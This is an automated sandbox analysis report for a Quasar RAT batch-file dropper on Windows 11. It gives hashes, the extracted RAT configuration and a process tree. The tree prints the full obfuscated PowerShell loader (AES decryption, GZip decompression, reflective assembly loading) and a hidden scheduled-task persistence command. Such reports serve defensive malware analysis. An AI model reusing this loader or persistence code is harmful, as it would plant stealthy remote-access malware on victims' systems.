Analysis

  • max time kernel
    146s
  • max time network
    157s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240508-en
  • resource tags

    arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    05-06-2024 21:41

General

  • Target

    $phantom-skull.bat

  • Size

    586KB

  • MD5

    3f4ece14276b9a3e1e10af1a2b1b8dfe

  • SHA1

    a69c879a38c3aa8f45cd68721e92da4b2764a21b

  • SHA256

    5e93bfa2d2fe95587cc4188f3cec20920ac1cf9c14940409c598f23147db1b8a

  • SHA512

    e5b7542ee731c02b3aec132a769974f4e3f43496cfd538df76553695e06d24c0f1153cd76581a0a9874194adf2eca60c5bfb43ad6f57e12b96b60abf4f4f586a

  • SSDEEP

    12288:ojDtCqD6/FY2qyiInQaRxp2Dgtmf3jk4pn+Zn9r+N4I85IS/j0FYd:o/hG/jqnINn2DgMjXn+ZN+/Nxed

Malware Config

Extracted

Family

quasar

Version

1.3.0.0

Botnet

Office04

C2

127.0.0.1:4782

Mutex

QSR_MUTEX_6eCif6XcwfXry8UScl

Attributes
  • encryption_key

    5nBytPW7wGaoGTQFl19L

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Quasar Client Startup

  • subdirectory

    SubDir

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 1 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell and hide display window.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies data under HKEY_USERS 1 IoCs
  • Modifies registry class 9 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 61 IoCs

Processes

  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k DcomLaunch -p
    1⤵
    • Modifies registry class
    PID:804
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k RPCSS -p
    1⤵
      PID:924
    • C:\Windows\system32\svchost.exe
      C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
      1⤵
        PID:980
      • C:\Windows\System32\svchost.exe
        C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
        1⤵
          PID:916
        • C:\Windows\System32\svchost.exe
          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
          1⤵
            PID:1020
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
            1⤵
              PID:1032
            • C:\Windows\system32\svchost.exe
              C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p
              1⤵
                PID:1112
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                1⤵
                  PID:1128
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                  1⤵
                    PID:1164
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                    1⤵
                      PID:1212
                    • C:\Windows\System32\svchost.exe
                      C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
                      1⤵
                        PID:1224
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                        1⤵
                          PID:1292
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                          1⤵
                            PID:1340
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                            1⤵
                              PID:1476
                            • C:\Windows\System32\svchost.exe
                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                              1⤵
                                PID:1484
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                1⤵
                                  PID:1556
                                • C:\Windows\System32\svchost.exe
                                  C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                  1⤵
                                    PID:1568
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                    1⤵
                                      PID:1680
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k NetworkService -p
                                      1⤵
                                        PID:1688
                                      • C:\Windows\System32\svchost.exe
                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                        1⤵
                                          PID:1736
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                          1⤵
                                            PID:1812
                                          • C:\Windows\system32\svchost.exe
                                            C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                            1⤵
                                              PID:1852
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                              1⤵
                                                PID:1892
                                              • C:\Windows\system32\svchost.exe
                                                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                1⤵
                                                  PID:1904
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                  1⤵
                                                    PID:1992
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                    1⤵
                                                      PID:2032
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p
                                                      1⤵
                                                        PID:2088
                                                      • C:\Windows\System32\svchost.exe
                                                        C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                        1⤵
                                                          PID:2164
                                                        • C:\Windows\System32\svchost.exe
                                                          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                          1⤵
                                                            PID:2384
                                                          • C:\Windows\system32\svchost.exe
                                                            C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                            1⤵
                                                              PID:2452
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                              1⤵
                                                                PID:2460
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k NetworkService -p
                                                                1⤵
                                                                  PID:2512
                                                                • C:\Windows\System32\svchost.exe
                                                                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                  1⤵
                                                                    PID:2628
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                    1⤵
                                                                      PID:2672
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                      1⤵
                                                                        PID:2688
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                        1⤵
                                                                          PID:2724
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                          1⤵
                                                                            PID:2476
                                                                          • C:\Windows\Explorer.EXE
                                                                            C:\Windows\Explorer.EXE
                                                                            1⤵
                                                                            • Suspicious behavior: GetForegroundWindowSpam
                                                                            PID:3320
                                                                            • C:\Windows\system32\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\$phantom-skull.bat"
                                                                              2⤵
                                                                              • Suspicious use of WriteProcessMemory
                                                                              PID:4432
                                                                              • C:\Windows\system32\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1tZl9+chFvFUMivNPwRvE1J//QYCwffyFtkUsPgq+ck='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('AMw+lJFY+Lujvh0Sp7EJlQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $TVPzB=New-Object System.IO.MemoryStream(,$param_var); $YCfwC=New-Object System.IO.MemoryStream; $ZJpOk=New-Object System.IO.Compression.GZipStream($TVPzB, [IO.Compression.CompressionMode]::Decompress); $ZJpOk.CopyTo($YCfwC); $ZJpOk.Dispose(); $TVPzB.Dispose(); $YCfwC.Dispose(); $YCfwC.ToArray();}function execute_function($param_var,$param2_var){ $AlGMz=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $anIMO=$AlGMz.EntryPoint; $anIMO.Invoke($null, $param2_var);}$JaPUK = 'C:\Users\Admin\AppData\Local\Temp\$phantom-skull.bat';$host.UI.RawUI.WindowTitle = $JaPUK;$cbIiD=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($JaPUK).Split([Environment]::NewLine);foreach ($kSbQD in $cbIiD) { if ($kSbQD.StartsWith('JbAefUgjahVjAymduHEl')) { $BhOFY=$kSbQD.Substring(20); break; }}$payloads_var=[string[]]$BhOFY.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                                                                                3⤵
                                                                                  PID:1152
                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                                                                  3⤵
                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                  • Modifies registry class
                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  • Suspicious use of WriteProcessMemory
                                                                                  PID:3252
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_786_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_786.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                                                                                    4⤵
                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:704
                                                                                  • C:\Windows\System32\WScript.exe
                                                                                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_786.vbs"
                                                                                    4⤵
                                                                                    • Suspicious use of WriteProcessMemory
                                                                                    PID:4836
                                                                                    • C:\Windows\system32\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_786.bat" "
                                                                                      5⤵
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:1288
                                                                                      • C:\Windows\system32\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1tZl9+chFvFUMivNPwRvE1J//QYCwffyFtkUsPgq+ck='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('AMw+lJFY+Lujvh0Sp7EJlQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $TVPzB=New-Object System.IO.MemoryStream(,$param_var); $YCfwC=New-Object System.IO.MemoryStream; $ZJpOk=New-Object System.IO.Compression.GZipStream($TVPzB, [IO.Compression.CompressionMode]::Decompress); $ZJpOk.CopyTo($YCfwC); $ZJpOk.Dispose(); $TVPzB.Dispose(); $YCfwC.Dispose(); $YCfwC.ToArray();}function execute_function($param_var,$param2_var){ $AlGMz=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $anIMO=$AlGMz.EntryPoint; $anIMO.Invoke($null, $param2_var);}$JaPUK = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_786.bat';$host.UI.RawUI.WindowTitle = $JaPUK;$cbIiD=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($JaPUK).Split([Environment]::NewLine);foreach ($kSbQD in $cbIiD) { if ($kSbQD.StartsWith('JbAefUgjahVjAymduHEl')) { $BhOFY=$kSbQD.Substring(20); break; }}$payloads_var=[string[]]$BhOFY.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                                                                                        6⤵
                                                                                          PID:2396
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                                                                          6⤵
                                                                                          • Blocklisted process makes network request
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:4968
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                1⤵
                                                                                  PID:3464
                                                                                • C:\Windows\system32\svchost.exe
                                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
                                                                                  1⤵
                                                                                    PID:3500
                                                                                  • C:\Windows\system32\svchost.exe
                                                                                    C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
                                                                                    1⤵
                                                                                      PID:3952
                                                                                    • C:\Windows\system32\svchost.exe
                                                                                      C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
                                                                                      1⤵
                                                                                        PID:4420
                                                                                      • C:\Windows\system32\svchost.exe
                                                                                        C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                        1⤵
                                                                                          PID:4408
                                                                                        • C:\Windows\system32\svchost.exe
                                                                                          C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                          1⤵
                                                                                            PID:864
                                                                                          • C:\Windows\System32\svchost.exe
                                                                                            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                            1⤵
                                                                                              PID:1948
                                                                                            • C:\Windows\system32\svchost.exe
                                                                                              C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                              1⤵
                                                                                              • Modifies data under HKEY_USERS
                                                                                              PID:5116
                                                                                            • C:\Windows\System32\svchost.exe
                                                                                              C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                              1⤵
                                                                                                PID:2640

                                                                                              Network

                                                                                              MITRE ATT&CK Enterprise v15

                                                                                              Replay Monitor

                                                                                              Loading Replay Monitor...

                                                                                              Downloads

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                Filesize

                                                                                                3KB

                                                                                                MD5

                                                                                                df472dcddb36aa24247f8c8d8a517bd7

                                                                                                SHA1

                                                                                                6f54967355e507294cbc86662a6fbeedac9d7030

                                                                                                SHA256

                                                                                                e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6

                                                                                                SHA512

                                                                                                06383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                                                                                Filesize

                                                                                                1KB

                                                                                                MD5

                                                                                                3ec0d76d886b2f4b9f1e3da7ce9e2cd7

                                                                                                SHA1

                                                                                                68a6a2b7b0fa045cd9cf7d63d4e30600a7b25dea

                                                                                                SHA256

                                                                                                214be9e8293b00fc05089068033edb41da350e0f127dd782bf6cb748000a56a5

                                                                                                SHA512

                                                                                                a49d758d03e3a7bc38be29d577c3e0d0c69eb08d0496a81b9406b446c5808d7dfbab39c5be3b45cbb4aec511d87c6166453cbd12cebe5d8663a60b5d773206c6

                                                                                              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bdswtfn2.4vk.ps1

                                                                                                Filesize

                                                                                                60B

                                                                                                MD5

                                                                                                d17fe0a3f47be24a6453e9ef58c94641

                                                                                                SHA1

                                                                                                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                SHA256

                                                                                                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                SHA512

                                                                                                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                              • C:\Users\Admin\AppData\Roaming\$phantom-startup_str_786.bat

                                                                                                Filesize

                                                                                                586KB

                                                                                                MD5

                                                                                                3f4ece14276b9a3e1e10af1a2b1b8dfe

                                                                                                SHA1

                                                                                                a69c879a38c3aa8f45cd68721e92da4b2764a21b

                                                                                                SHA256

                                                                                                5e93bfa2d2fe95587cc4188f3cec20920ac1cf9c14940409c598f23147db1b8a

                                                                                                SHA512

                                                                                                e5b7542ee731c02b3aec132a769974f4e3f43496cfd538df76553695e06d24c0f1153cd76581a0a9874194adf2eca60c5bfb43ad6f57e12b96b60abf4f4f586a

                                                                                              • C:\Users\Admin\AppData\Roaming\$phantom-startup_str_786.vbs

                                                                                                Filesize

                                                                                                124B

                                                                                                MD5

                                                                                                3aae4ea544cc2cd35aaa9054c0e90dfb

                                                                                                SHA1

                                                                                                376f49daa1f20d18b0dc90680e479488991915f2

                                                                                                SHA256

                                                                                                88c0b8dc771efe205028ad26228033911d375e4f1a37e32941791f83bc23ae00

                                                                                                SHA512

                                                                                                44943534c5e403591f54272a6cd9379d1f440c14cc130c7441a21e6b1def3ae342fd9b532488494d02487a10612a8b01b222c1c3376c486a0aeb8b9a0880d2b2

                                                                                              • memory/704-17-0x00007FF836930000-0x00007FF8373F2000-memory.dmp

                                                                                                Filesize

                                                                                                10.8MB

                                                                                              • memory/704-18-0x00007FF836930000-0x00007FF8373F2000-memory.dmp

                                                                                                Filesize

                                                                                                10.8MB

                                                                                              • memory/704-27-0x00007FF836930000-0x00007FF8373F2000-memory.dmp

                                                                                                Filesize

                                                                                                10.8MB

                                                                                              • memory/704-30-0x00007FF836930000-0x00007FF8373F2000-memory.dmp

                                                                                                Filesize

                                                                                                10.8MB

                                                                                              • memory/924-110-0x00007FF817B50000-0x00007FF817B60000-memory.dmp

                                                                                                Filesize

                                                                                                64KB

                                                                                              • memory/1164-101-0x00007FF817B50000-0x00007FF817B60000-memory.dmp

                                                                                                Filesize

                                                                                                64KB

                                                                                              • memory/1212-98-0x00007FF817B50000-0x00007FF817B60000-memory.dmp

                                                                                                Filesize

                                                                                                64KB

                                                                                              • memory/1292-104-0x00007FF817B50000-0x00007FF817B60000-memory.dmp

                                                                                                Filesize

                                                                                                64KB

                                                                                              • memory/1340-95-0x00007FF817B50000-0x00007FF817B60000-memory.dmp

                                                                                                Filesize

                                                                                                64KB

                                                                                              • memory/1476-107-0x00007FF817B50000-0x00007FF817B60000-memory.dmp

                                                                                                Filesize

                                                                                                64KB

                                                                                              • memory/1556-102-0x00007FF817B50000-0x00007FF817B60000-memory.dmp

                                                                                                Filesize

                                                                                                64KB

                                                                                              • memory/1568-94-0x00007FF817B50000-0x00007FF817B60000-memory.dmp

                                                                                                Filesize

                                                                                                64KB

                                                                                              • memory/1680-97-0x00007FF817B50000-0x00007FF817B60000-memory.dmp

                                                                                                Filesize

                                                                                                64KB

                                                                                              • memory/1812-108-0x00007FF817B50000-0x00007FF817B60000-memory.dmp

                                                                                                Filesize

                                                                                                64KB

                                                                                              • memory/1948-109-0x00007FF817B50000-0x00007FF817B60000-memory.dmp

                                                                                                Filesize

                                                                                                64KB

                                                                                              • memory/2032-106-0x00007FF817B50000-0x00007FF817B60000-memory.dmp

                                                                                                Filesize

                                                                                                64KB

                                                                                              • memory/2164-99-0x00007FF817B50000-0x00007FF817B60000-memory.dmp

                                                                                                Filesize

                                                                                                64KB

                                                                                              • memory/2452-111-0x00007FF817B50000-0x00007FF817B60000-memory.dmp

                                                                                                Filesize

                                                                                                64KB

                                                                                              • memory/2476-103-0x00007FF817B50000-0x00007FF817B60000-memory.dmp

                                                                                                Filesize

                                                                                                64KB

                                                                                              • memory/2672-96-0x00007FF817B50000-0x00007FF817B60000-memory.dmp

                                                                                                Filesize

                                                                                                64KB

                                                                                              • memory/3252-12-0x000001EF6C250000-0x000001EF6C296000-memory.dmp

                                                                                                Filesize

                                                                                                280KB

                                                                                              • memory/3252-15-0x000001EF6C2A0000-0x000001EF6C310000-memory.dmp

                                                                                                Filesize

                                                                                                448KB

                                                                                              • memory/3252-0-0x00007FF836933000-0x00007FF836935000-memory.dmp

                                                                                                Filesize

                                                                                                8KB

                                                                                              • memory/3252-9-0x000001EF6BE20000-0x000001EF6BE42000-memory.dmp

                                                                                                Filesize

                                                                                                136KB

                                                                                              • memory/3252-105-0x00007FF836930000-0x00007FF8373F2000-memory.dmp

                                                                                                Filesize

                                                                                                10.8MB

                                                                                              • memory/3252-11-0x00007FF836930000-0x00007FF8373F2000-memory.dmp

                                                                                                Filesize

                                                                                                10.8MB

                                                                                              • memory/3252-10-0x00007FF836930000-0x00007FF8373F2000-memory.dmp

                                                                                                Filesize

                                                                                                10.8MB

                                                                                              • memory/3252-13-0x00007FF836930000-0x00007FF8373F2000-memory.dmp

                                                                                                Filesize

                                                                                                10.8MB

                                                                                              • memory/3252-14-0x000001EF6BE90000-0x000001EF6BE98000-memory.dmp

                                                                                                Filesize

                                                                                                32KB

                                                                                              • memory/3320-47-0x0000000004AE0000-0x0000000004B0A000-memory.dmp

                                                                                                Filesize

                                                                                                168KB

                                                                                              • memory/3320-100-0x00007FF817B50000-0x00007FF817B60000-memory.dmp

                                                                                                Filesize

                                                                                                64KB

                                                                                              • memory/4968-142-0x000002A9B0A70000-0x000002A9B0ACE000-memory.dmp

                                                                                                Filesize

                                                                                                376KB

                                                                                              • memory/4968-143-0x000002A9B0EF0000-0x000002A9B0F02000-memory.dmp

                                                                                                Filesize

                                                                                                72KB

                                                                                              • memory/4968-144-0x000002A9B0F50000-0x000002A9B0F8C000-memory.dmp

                                                                                                Filesize

                                                                                                240KB